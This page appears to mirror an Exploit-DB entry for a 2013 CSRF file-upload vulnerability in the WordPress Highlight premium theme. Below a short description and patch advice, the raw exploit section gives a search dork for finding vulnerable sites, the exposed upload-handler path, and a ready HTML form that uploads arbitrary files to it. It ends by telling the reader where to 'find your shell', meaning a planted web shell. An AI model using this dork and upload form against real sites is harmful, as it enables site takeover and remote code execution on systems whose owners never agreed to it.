header-logo
Suggest Exploit
vendor:
Wordpress Highlight Premium Themes
by:
DevilScreaM
8,8
CVSS
HIGH
CSRF
352
CWE
Product Name: Wordpress Highlight Premium Themes
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: Yes
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Mozila, Chrome, Opera -> Windows & Linux
2013

WordPress Highlight Premium Themes CSRF File Upload Vulnerability

A Cross-Site Request Forgery (CSRF) vulnerability was discovered in the Wordpress Highlight Premium Themes. An attacker can exploit this vulnerability to upload arbitrary files to the server, which can lead to remote code execution. The vulnerability exists due to insufficient validation of uploaded files in the upload-handler.php script. An attacker can send a malicious request to the vulnerable script and upload arbitrary files to the server.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to update to the latest version of the Wordpress Highlight Premium Themes.
Source

Exploit-DB raw data:

#Title : Wordpress Highlight Premium Themes CSRF File Upload Vulnerability

#Author : DevilScreaM

#Date : 11/10/2013 - 10 November 2013

#Category : Web Applications

#Type : PHP

#Vendor : http://themeforest.net

#Download : http://themeforest.net/item/highlight-powerful-premium-wordpress-theme/168424

#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
 	  Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber

#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |

#Tested : Mozila, Chrome, Opera -> Windows & Linux

#Vulnerabillity : CSRF

#Dork : 

inurl:/wp-content/themes/highlight/


CSRF File Upload Vulnerability

Exploit & POC : 

http://site-target/wp-content/themes/highlight/lib/utils/upload-handler.php

Script :

<form enctype="multipart/form-data"
action="http://127.0.0.1/wp-content/themes/highlight/lib/utils/upload-handler.php" method="post"> 
Your File: <input name="uploadfile" type="file" /><br /> 
<input type="submit" value="upload" /> 
</form> 


File Access :

http://site-target/uploads/[years]/[month]/ > find your shell

Navigation

Suggest Exploit

Services By CQR